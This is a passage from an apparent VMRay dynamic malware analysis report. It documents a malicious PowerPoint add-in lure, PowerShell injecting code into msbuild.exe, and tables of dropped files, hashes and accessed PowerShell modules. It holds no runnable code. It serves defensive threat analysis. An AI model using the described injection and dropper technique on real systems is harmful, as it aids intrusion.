C: 2c75ad03937eee1046942d48b0fdc366e908d \Users\RDhJ0CNFevzX\AppData\Roaming\9 254.30 KB c00a5defc8f3b9513c7821a78b8 EDDE9\9BDC8A.exe
X-Ray Vision for Malware - www.vmray.com 23 / 50 DYNAMIC ANALYSIS REPORT #1559276
Host Behavior
Type Count
Module 1324
Registry 181
Mutex 1
File 292
System 41
User 9
Network Behavior
Type Count
HTTP 14
DNS 26
TCP 15
X-Ray Vision for Malware - www.vmray.com 24 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #14: msbuild.exe
ID 14
Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
Command Line #cmd
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 332549, Reason: Child Process
Unmonitor End Time End Time: 334199, Reason: Terminated
Monitor Duration 1.65s
Return Code 0
PID 4104
Parent PID 4188
Bitness 32 Bit
Injection Information (6)
Injection Type Source Process Source / Target TID Address / Name Size Success Count
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x400000(4194304) 0x400 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x401000(4198400) 0x13800 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x415000(4280320) 0x4200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x41a000(4300800) 0x200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x4a0000(4849664) 0x2000 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Control Flow 0x1034 / 0x10d4 - 1 dowspowershell\v1.0\po wershell.exe
Host Behavior
Type Count
Module 14
Registry 2
Mutex 1
X-Ray Vision for Malware - www.vmray.com 25 / 50 DYNAMIC ANALYSIS REPORT #1559276
Process #15: msbuild.exe
ID 15
Filename c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
Command Line #cmd
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 339819, Reason: Child Process
Unmonitor End Time End Time: 341822, Reason: Terminated
Monitor Duration 2.00s
Return Code 0
PID 1740
Parent PID 4188
Bitness 32 Bit
Injection Information (7)
Injection Type Source Process Source / Target TID Address / Name Size Success Count
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x400000(4194304) 0x400 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x401000(4198400) 0x13800 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x415000(4280320) 0x4200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x41a000(4300800) 0x200 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x4a0000(4849664) 0x2000 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Memory 0x1034 0x297008(2715656) 0x4 1 dowspowershell\v1.0\po wershell.exe
#7: c: \windows\syswow64\win Modify Control Flow 0x1034 / 0xe54 - 1 dowspowershell\v1.0\po wershell.exe
Host Behavior
Type Count
Module 14
Registry 2
Mutex 1
X-Ray Vision for Malware - www.vmray.com 26 / 50 DYNAMIC ANALYSIS REPORT #1559276
ARTIFACTS
File
SHA256 Filenames Category Filesize MIME Type Operations Verdict
C: a782285f1b9ee7ceef60 application/ \Users\RDhJ0CNFevzX\ c568aabd624f8082d76e vnd.openxmlformats- Desktop\Request For Sample File 8.71 KB MALICIOUS af900f53d020f58114692 officedocument.presenta Price quotation 8bf tionml.presentation 1-6-2021.ppam
c: bcef816778f3ff312e9f2c \users\rdhj0cnfevzx\app d0ab87f8bef762ce2fc14 data\local\microsoft\wind Modified File 32.90 KB text/html MALICIOUS 841c0dbade50da371c7 ows\inetcache\ie\knz1hg d6 rk\44[1].htm
86e3f0a44f4d4b8dae74 4588b839de98f8460523 ooo.bin Embedded File 18.00 KB application/CDFV2 MALICIOUS 609b3852e07884ca258 6bb1e
C: \Users\RDhJ0CNFevzX\ 2c75ad03937eee10469 AppData\Roaming\9ED application/ 42d48b0fdc366e908dc0 Write, Access, Create, DE9\9BDC8A.exe, C: Dropped File 254.30 KB vnd.microsoft.portable- SUSPICIOUS 0a5defc8f3b9513c7821 Delete \Windows\Microsoft.NET executable a78b8 \Framework\v4.0.30319\ msbuild.exe
C: 22ca5e3dcd26fa66a4af \Users\RDhJ0CNFevzX\ 4b4a5d47a6a3a17f4cb9 AppData\Local\Microsoft Modified File 36.12 KB text/plain Read, Access CLEAN abdd03707901758b28f5 \Windows\INetCache\IE\ c1d6 DZQW0FJC\115981500 -css_bundle_v2[1].css
C: 362b69c42b10b4a9d1a \Users\RDhJ0CNFevzX\ 79837f44f6ce3e5419d7 AppData\Local\Microsoft Modified File 26.01 KB text/plain Read, Access CLEAN 8684b94dc5ca2fe47187 \Windows\INetCache\IE\ 3d3aa Q2CT0HTU\377540072 2-ieretrofit[1].js
C: 2fa997e09f206cb872e7 \Users\RDhJ0CNFevzX\ 0d94837c6c32a5438f86 AppData\Local\Microsoft Modified File 146.35 KB text/plain Read, Access CLEAN a1c962886db3497b8af2 \Windows\INetCache\IE\ 6d2f 3UNUC0QX\415476789 3-widgets[1].js
C: 068ffe90977f2b5b2dc2e \Users\RDhJ0CNFevzX\ f18572166e85281bd0ec AppData\Local\Microsoft Modified File 6.36 KB text/plain Read, Access CLEAN b31c4902464b23db54d \Windows\INetCache\IE\ 2568 3UNUC0QX\cookienotic e[1].js
C: 0fc52ef116f03fd95f9857 \Users\RDhJ0CNFevzX\ 856f1e2cbdfa2cacc398e AppData\Local\Microsoft Modified File 3.72 KB text/plain Read, Access CLEAN 066db0d8d5481739bc2 \Windows\INetCache\IE\ d7 Q2CT0HTU\281434096- static_pages[1].css
C: \Users\RDhJ0CNFevzX\ 21cc4dc6c3c01b84c808 AppData\Local\Microsoft 004173f42e3ed1b4f095 \Windows\INetCache\IE\ Modified File 24.70 KB text/plain Read, Access CLEAN 51a10d69b4cec7394a1 3UNUC0QX\310173022 590e6 1- analytics_autotrack[1].js
C: 75f3d85ba830f388cc2a \Users\RDhJ0CNFevzX\ d21b8d6b3f7c8aa4b5c0 AppData\Local\Microsoft Modified File 172 bytes text/plain Read, Access CLEAN 2acaff391ac09723a5d2 \Windows\INetCache\IE\ 2970 KNZ1HGRK\css[1].css
C: 8684a32d1a10d050a26f \Users\RDhJ0CNFevzX\ c33192edf427a5f0c687 AppData\Local\Microsoft Modified File 42.48 KB text/plain Read, Access CLEAN 4c590a68d77ae6e0d18 \Windows\INetCache\IE\ 6bd8a DZQW0FJC\maia[1].css
C: 2cb09c7b3e19bfc41743 \Users\RDhJ0CNFevzX\ ca3624ef81c3258d5652 AppData\Local\Microsoft Modified File 48.00 KB text/plain Read, Access CLEAN 5647feac76aa757e0292 \Windows\INetCache\IE\ 627a Q2CT0HTU\analytics[1]. js
X-Ray Vision for Malware - www.vmray.com 27 / 50 DYNAMIC ANALYSIS REPORT #1559276
SHA256 Filenames Category Filesize MIME Type Operations Verdict
C: \Users\RDhJ0CNFevzX\ 01e698231e9d93dceaa AppData\Local\Microsoft 9a97f4e5cdbdbceefbea application/vnd.ms- \Windows\INetCache\IE\ Modified File 15.60 KB Read, Access CLEAN 67d4e39acd0391e1cae fontobject 3UNUC0QX\mem5YaGs 00889b 126MiZpBA- UN_r8OUuht[1].eot
C: 49d0d1473181447caad \Users\RDhJ0CNFevzX\ 524188bfcb1344b20a4ff AppData\Local\Microsoft Modified File 402 bytes text/plain Read, Access CLEAN a42bb0b5ff7695e379ae \Windows\INetCache\IE\ 3b79 DZQW0FJC\css[1].css
C: \Users\RDhJ0CNFevzX\ 9e90ea64ba9bf7c1feb8f AppData\Local\Microsoft 4218448f8f1f52578ba85 Write, Read, Access, \Windows\PowerShell\C Modified File 2.16 KB application/octet-stream CLEAN 7e235898ecfb4b97fce7 Create ommandAnalysis\Power eb Shell_AnalysisCacheInd ex
C: be869a73a160440e8bfc \Users\RDhJ0CNFevzX\ 5c7d84a907febd61075d AppData\Local\Microsoft application/vnd.ms- Modified File 17.40 KB Read, Access CLEAN 920d51c7d0097d7295c \Windows\INetCache\IE\ fontobject 865cd Q2CT0HTU\KFOmCnqE u92Fr1Mu4mxO[1].eot
c: 1422b27938e77fd6809d \users\rdhj0cnfevzx\app 3d1ae0f33fe2eec4bcc5c data\local\microsoft\wind Modified File 27.75 KB text/html CLEAN d3d9d84f6807fb462395 ows\inetcache\ie\knz1hg 780 rk\44[3].htm
c: d172d750493be64a7ed \users\rdhj0cnfevzx\app 84dec1dd2a0d787ba42f data\local\microsoft\wind Dropped File 475 bytes image/png CLEAN 78bc694b0858f152c52b ows\inetcache\ie\knz1hg 6620b rk\icon18_wrench_allbk g[1].png
C: b1313dd95eaf63f33f86f \Users\RDhJ0CNFevzX\ 72f09e2ecd700d11159a AppData\Local\Microsoft Dropped File 47.97 KB application/octet-stream Access, Create CLEAN 8693210c37470fcb8403 \Internet 8f7 Explorer\MSIMGSIZ.DA T
c: 0fdcb4746995f0d5240e \users\rdhj0cnfevzx\app 5ec11370cb950722a89 data\local\microsoft\wind Dropped File 95 bytes image/png CLEAN 4f3cff4118aa68ccc9201 ows\inetcache\ie\q2ct0ht 0edd u\body_gradient_tile_lig ht[1].png
c: ecb30886406e3f776ff7b \users\rdhj0cnfevzx\app c3834de849944471e62 data\local\microsoft\wind Dropped File 403 bytes image/png CLEAN 6ff148bed2fa389d02866 ows\inetcache\ie\knz1hg 044 rk\gradients_light[1].png
c: efea3840519cec682883 \users\rdhj0cnfevzx\app 5e879cb29cf9c45d7f45a data\local\microsoft\wind Dropped File 147.90 KB text/html CLEAN 8e920852b9ee2129bcfe ows\inetcache\ie\q2ct0ht b95 u\blogin[1].htm
c: cbad27c35fbc84e2da42 \users\rdhj0cnfevzx\app 80476adeb197566db27 data\local\microsoft\wind Dropped File 1.13 KB image/png CLEAN 50b8b4a79eb7e872db8 ows\inetcache\ie\dzqw0f d8acb7 jc\blogger-logotype- color-black-1x[1].png
c: \users\rdhj0cnfevzx\app data\roaming\microsoft\c e641ff8107a4197ded9f5 rypto\rsa\s-1-5-21-1560 58d1891e716811e9a7f1 258661-3990802383-18 Dropped File 53 bytes application/octet-stream CLEAN 09f14e876f5a8394844d 11730007-1000\3d3578 c34 a85286f88c6cd9d151e4 412949_03845cb8-7441 -4a2f-8c0f- c90408af5778
859ffdca62ee0971821a C: 4b2dedfc023d0f9a0213 \Users\RDhJ0CNFevzX\ Write, Access, Create, Dropped File 4 bytes text/plain CLEAN 91b5ac336ddb49d53d2 AppData\Roaming\9ED Delete 8330e DE9\9BDC8A.hdb
X-Ray Vision for Malware - www.vmray.com 28 / 50 DYNAMIC ANALYSIS REPORT #1559276
SHA256 Filenames Category Filesize MIME Type Operations Verdict
6b86b273ff34fce19d6b8 C: 04eff5a3f5747ada4eaa2 \Users\RDhJ0CNFevzX\ Write, Access, Create, Dropped File 1 bytes application/octet-stream CLEAN 2f1d49c01e52ddb7875b AppData\Roaming\9ED Delete 4b DE9\9BDC8A.lck
C: \Users\RDhJ0CNFevzX\ AppData\Local\Microsoft \Windows\INetCache\IE\ 3UNUC0QX\error[1], C: 7990e703ae060c241eb \Users\RDhJ0CNFevzX\ a6257d963af2ecf9c6f3f AppData\Local\Microsoft Dropped File 3.17 KB text/html Write, Access, Create CLEAN bdb57264c1d48dda817 \Windows\INetCache\IE\ 1e754 KNZ1HGRK\error[1], C: \Users\RDhJ0CNFevzX\ AppData\Local\Microsoft \Windows\INetCache\IE\ DZQW0FJC\error[1]
c: 82f8ca6d30d6f9c32637 \users\rdhj0cnfevzx\app 43cfe1e15f47a4c268d4 data\local\microsoft\wind Dropped File 98 bytes text/plain CLEAN 64a7c18bc6b69dd97e1 ows\inetcookies\7yx640 2fb57 0f.txt
c: 4c3ea140e5dafcf0a671 \users\rdhj0cnfevzx\app 4eb5d4b0991e6385466 data\local\microsoft\wind Dropped File 195 bytes text/plain CLEAN db3e47d2f3712dd6e5a2 ows\inetcookies\u2phfk4 e281d 2.txt
c: \users\rdhj0cnfevzx\app data\roaming\microsoft\c 353fd628b7f6e7d426e5 rypto\rsa\s-1-5-21-1560 d6a27d1bc3ac22fa7f81 258661-3990802383-18 Dropped File 53 bytes application/octet-stream CLEAN 2e7594cf2ec5ca117578 11730007-1000\3d3578 5b50 a85286f88c6cd9d151e4 412949_03845cb8-7441 -4a2f-8c0f- c90408af5778
e6f579ba8364a6c6733b 815b6efb470cfad2240c Downloaded File 288 bytes application/octet-stream CLEAN 3c377c1f5c01f8faf8d955 01
32b116ee819bd760f952 6bb1bcefd399e2ac423c Downloaded File 10.04 KB text/html CLEAN ca65247bab7d5ab5baa 606f3
ff6fe43e4a4d300b15926 f0f2f546d300193c202d0 Downloaded File 186 bytes application/octet-stream CLEAN 97d4a49e23d86827063 d6b
9811b34e5885a16e500 1187e9065a0886c709e Downloaded File 159 bytes application/octet-stream CLEAN 028e2eff8a485374dcaf0 bc6ed
039d5eeead864652465 362a1cefa85d77c0b392 Downloaded File 217 bytes text/html CLEAN 21a1a67fc8b4d421fc8c9 3d38
Filename
Filename Category Operations Verdict
C:\Program Files (x86)\Common Files\Microsoft Accessed File Access CLEAN Shared\VBA\VBA7.1\VBE7.DLL
C:\Windows\SysWOW64\mshta.exe Accessed File Access CLEAN
Win.ini Accessed File Read, Access CLEAN
System Paging File Accessed File Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\DZQW0FJC\115 981500-css_bundle_v2[1].css
X-Ray Vision for Malware - www.vmray.com 29 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\Q2CT0HTU\3775 400722-ieretrofit[1].js
C:\Windows\SYSTEM32\jscript9.dll Accessed File Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Dropped File Access, Create CLEAN soft\Internet Explorer\MSIMGSIZ.DAT
C:\Windows\SysWOW64\schtasks.exe Accessed File Access CLEAN
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\3UNUC0QX\cook ienotice[1].js
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Dropped File Write, Access, Create CLEAN soft\Windows\INetCache\IE\DZQW0FJC\error [1]
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\KNZ1HGRK\css[ 1].css
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\DZQW0FJC\mai a[1].css
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\3UNUC0QX\415 4767893-widgets[1].js
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Dropped File Write, Access, Create CLEAN soft\Windows\INetCache\IE\3UNUC0QX\error [1]
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\Q2CT0HTU\2814 34096-static_pages[1].css
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\Q2CT0HTU\anal ytics[1].js
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\3UNUC0QX\me m5YaGs126MiZpBA-UN_r8OUuht[1].eot
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Modified File Read, Access CLEAN soft\Windows\INetCache\IE\3UNUC0QX\310 1730221-analytics_autotrack[1].js
C: \Users\RDhJ0CNFevzX\AppData\Local\Micro Dropped File Write, Access, Create CLEAN soft\Windows\INetCache\IE\KNZ1HGRK\error [1]
C: \Windows\SysWOW64\WindowsPowerShell\v Accessed File Access CLEAN 1.0\powershell.exe
C:\Windows\system32 Accessed File Access CLEAN
C:\Windows Accessed File Access CLEAN
C:\Windows\System32\Wbem Accessed File Access CLEAN
C: \Windows\System32\WindowsPowerShell\v1. Accessed File Access CLEAN 0\
C:\Program Files (x86)\Microsoft Accessed File Access CLEAN Office\root\Client
C:\Program Accessed File Access CLEAN Files\WindowsPowerShell\Modules
X-Ray Vision for Malware - www.vmray.com 30 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
C: \Windows\system32\WindowsPowerShell\v1. Accessed File Access CLEAN 0\Modules
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\AppLocker
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\AppLocker\AppLocker.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Appx
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Appx\Appx.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\BitsTransfer
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\BitsTransfer\BitsTransfer.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\BranchCache
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\BranchCache\BranchCache.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\CimCmdlets
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\CimCmdlets\CimCmdlets.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\DirectAccessClientComponents
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\DirectAccessClientComponents\Dire ctAccessClientComponents.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Dism
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Dism\Dism.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\DnsClient
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\DnsClient\DnsClient.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\EventTracingManagement
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\EventTracingManagement\EventTra cingManagement.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\International
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\International\International.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\iSCSI
X-Ray Vision for Malware - www.vmray.com 31 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\iSCSI\iSCSI.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\ISE
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\ISE\ISE.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Kds
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Kds\Kds.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en-US
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en- US\en-US.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en- US\en-US.psm1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en- US\en-US.cdxml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en- US\en-US.xaml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\en- US\en-US.dll
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Archive\Micros oft.PowerShell.Archive.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Diagnostics
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Diagnostics\Mi crosoft.PowerShell.Diagnostics.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Host
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Host\Microsoft .PowerShell.Host.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Management
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Management\ Microsoft.PowerShell.Management.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US
X-Ray Vision for Malware - www.vmray.com 32 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US\en-US.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US\en-US.psm1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US\en-US.cdxml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US\en-US.xaml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\en- US\en-US.dll
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.ODataUtils\Mi crosoft.PowerShell.ODataUtils.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Security
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Security\Micro soft.PowerShell.Security.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Utility
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.PowerShell.Utility\Microsof t.PowerShell.Utility.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.WSMan.Management
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Microsoft.WSMan.Management\Micr osoft.WSMan.Management.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\MsDtc
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\MsDtc\MsDtc.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetAdapter
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetConnection
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetConnection\NetConnection.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetEventPacketCapture
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetEventPacketCapture\NetEventP acketCapture.psd1
X-Ray Vision for Malware - www.vmray.com 33 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetLbfo
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetLbfo\NetLbfo.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetNat
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetNat\NetNat.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetQos
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetQos\NetQos.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetSecurity
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetSecurity\NetSecurity.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetSwitchTeam
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetSwitchTeam\NetSwitchTeam.psd 1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetTCPIP
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetTCPIP\NetTCPIP.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetworkConnectivityStatus
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetworkConnectivityStatus\Network ConnectivityStatus.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetworkTransition
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\NetworkTransition\NetworkTransitio n.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PKI
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PKI\PKI.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PnpDevice
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PnpDevice\PnpDevice.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PrintManagement
X-Ray Vision for Malware - www.vmray.com 34 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PrintManagement\PrintManagement .psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSDesiredStateConfiguration
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSDesiredStateConfiguration\PSDe siredStateConfiguration.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSDiagnostics
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSDiagnostics\PSDiagnostics.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSScheduledJob
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\PSScheduledJob\PSScheduledJob. psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\ScheduledTasks
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\ScheduledTasks\ScheduledTasks.ps d1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\SecureBoot
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\SecureBoot\SecureBoot.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Storage
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Storage\Storage.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TLS
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TLS\TLS.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TroubleshootingPack
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TroubleshootingPack\Troubleshootin gPack.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TrustedPlatformModule
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\TrustedPlatformModule\TrustedPlatf ormModule.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\VpnClient
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\VpnClient\VpnClient.psd1
X-Ray Vision for Malware - www.vmray.com 35 / 50 DYNAMIC ANALYSIS REPORT #1559276
Filename Category Operations Verdict
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Wdac
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Wdac\Wdac.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsDeveloperLicense
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsDeveloperLicense\Window sDeveloperLicense.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsErrorReporting
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsErrorReporting\WindowsEr rorReporting.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsUpdate
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\WindowsUpdate\WindowsUpdate.ps d1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Modules.psd1
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Modules.psm1
